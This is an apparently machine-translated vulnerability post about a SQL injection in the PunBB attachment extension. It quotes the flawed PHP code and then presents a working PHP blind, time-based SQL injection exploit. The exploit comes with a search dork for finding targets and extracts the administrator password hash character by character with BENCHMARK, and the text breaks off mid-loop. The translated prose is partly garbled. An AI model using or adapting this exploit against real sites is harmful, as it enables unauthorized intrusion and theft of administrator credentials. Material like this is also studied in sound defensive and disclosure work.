PunBB official attachment upload extension Injection Vulnerability

PunBB official upload attachment extension injection vulnerability Author: Ryatif (isset ($ _ GET [secure_str]) {if (preg_match (~ (\ D +) f (\ d + )~, $ _ GET [secure_str], $ match) {... WHEREa. AND (fp. read_forumISNULLORfp.read_forum1) ANDsecure _

PunBB official attachment upload extension Injection Vulnerability

Author: Ryat

 
 

  
  
if (isset($_GET[\'secure_str\']))  
  
  
{  
  
  
    if (preg_match(\'~(d+)f(d+)~\', $_GET[\'secure_str\'], $match))  
  
  
    {  
  
  
    ...  
  
  
            \'WHERE\'        => \'a.id = \'.$attach_item.\' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \'\'.$_GET[\'secure_str\'].\'\'\'     
 
 

Obviously, it should beRegular ExpressionThe misuse of expressions and preg_match functions can trigger SQL inj through $ _ GET [\ 'Secure _ str...

In addition, in pun_list_attach.PhpThere is also an injection for the file, but the background permissions are required. If you are interested, you need to see it more clearly :)

Finally, let's give a PoC EXP. Don't ask me about the specific effect and utilization...

 
 

  
  
#!/usr/bin/php  
  
  
 
  
  
 
  
  
print_r(\'  
  
  
+---------------------------------------------------------------------------+  
  
  
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit  
  
  
by puret_t  
  
  
mail: puretot at gmail dot com  
  
  
team: http://www.wolvez.org  
  
  
dork: "Powered by PunBB" 
  
  
+---------------------------------------------------------------------------+  
  
  
\');  
  
  
/**  
  
  
 * works regardless of php.ini settings  
  
  
 */ 
  
  
if ($argc < 3) {  
  
  
    print_r(\'  
  
  
+---------------------------------------------------------------------------+  
  
  
Usage: php \'.$argv[0].\' host path  
  
  
host:      target server (ip/hostname)  
  
  
path:      path to punbb  
  
  
Example:  
  
  
php \'.$argv[0].\' localhost /punbb/  
  
  
+---------------------------------------------------------------------------+  
  
  
\');  
  
  
    exit;  
  
  
}  
  
  
 
  
  
error_reporting(7);  
  
  
ini_set(\'max_execution_time\', 0);  
  
  
 
  
  
$host = $argv[1];  
  
  
$path = $argv[2];  
  
  
 
  
  
$pre = \'pun_\';  
  
  
 
  
  
$benchmark = 200000000;  
  
  
$timeout = 10;  
  
  
 
  
  
echo "Plz Waiting...nPassword:n";  
  
  
/**  
  
  
 * get pass  
  
  
 */ 
  
  
$j = 1;  
  
  
$pass = \'\';  
  
  
 
  
  
$hash[0] = 0; //null  
  
  
$hash = array_merge($hash, range(48, 57)); //numbers  
  
  
$hash = array_merge($hash, range(97, 122)); //a-z letters  
  
  
 
  
  
while (strlen($pass) < 40) {  
  
  
    for ($i = 0; $i <= 255; $i ++) {  
  
  
        if (in_array($i, $hash)) {  
  
  
            $cmd = \'1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20\'.$pre.\'users%20WHERE%20group_id=1%20LIMIT%201),\'.$j.\',1))=\'.$i.\'),BENCHMARK(\'.$benchmark.\',CHAR(0)),1))%23\';  
  
  
            send();  
  
  
            usleep(2000000);